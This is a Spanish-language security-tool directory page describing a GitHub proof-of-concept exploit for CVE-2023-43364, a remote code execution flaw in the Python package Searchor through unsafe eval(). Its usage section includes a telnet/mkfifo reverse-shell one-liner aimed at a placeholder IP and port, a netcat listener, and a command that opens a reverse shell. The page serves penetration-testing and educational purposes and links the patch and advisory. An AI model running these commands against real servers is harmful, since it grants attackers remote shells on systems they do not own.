Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-43364-Searchor-RCE-Exploit — Exploit de prueba de concepto mediante el uso inseguro de `eval()` en Searchor (< 2.4.2) | Kitploit
Herramientas/GitHubGitHub/herick-costa/cve-2023-43364-searchor-rce-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubherick-costa/cve-2023-43364-searchor-rce-exploit

CVE-2023-43364-Searchor-RCE-Exploit

Exploit de prueba de concepto mediante el uso inseguro de `eval()` en Searchor (< 2.4.2)

Ver Repositorio
16hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-43364 – Exploit RCE de Searchor (PoC)

Ejecución Remota de Código (RCE) mediante uso inseguro de eval() en Searchor (< 2.4.2)

Resumen

Este proyecto demuestra la explotación de CVE-2023-43364, una vulnerabilidad de Ejecución Remota de Código (RCE) que afecta al paquete Python Searchor (< 2.4.2).

El problema es causado por el uso inseguro de eval() en entradas controladas por el usuario, permitiendo a atacantes inyectar y ejecutar código Python arbitrario.

La vulnerabilidad fue solucionada eliminando el uso inseguro de eval(), como se muestra en el parche oficial:

  • https://github.com/ArjunSharda/Searchor/commit/16016506f7bf92b0f21f51841d599126d6fcd15b

Detalles técnicos adicionales y aviso:

  • https://github.com/advisories/GHSA-66m2-493m-crh2

Esta prueba de concepto proporciona múltiples métodos de ejecución, incluyendo ejecución de comandos, validación de pruebas y shells inversas.

Uso

Probar RCE

Ejecutar un comando simple (id) para verificar la ejecución de código:

python3 CVE-2023-43364.py <URL> --test

Ejecutar comando personalizado

Ejecutar cualquier comando en el servidor objetivo:

python3 CVE-2023-43364.py <URL> -a "whoami"

Ejemplos:

python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"

Shell inversa

Iniciar un listener en tu máquina:

nc -lvnp 4444

Ejecutar el exploit:

python3 CVE-2023-43364.py <URL> <LHOST>

⚠️ Descargo de responsabilidad

Este proyecto está destinado a:

  • fines educativos
  • investigación en seguridad
  • pruebas de penetración autorizadas únicamente

El autor no se hace responsable por cualquier mal uso o daño causado por esta herramienta.

Usa este exploit solo en entornos controlados o en sistemas donde tengas permiso explícito para realizar pruebas.

Descargar herramienta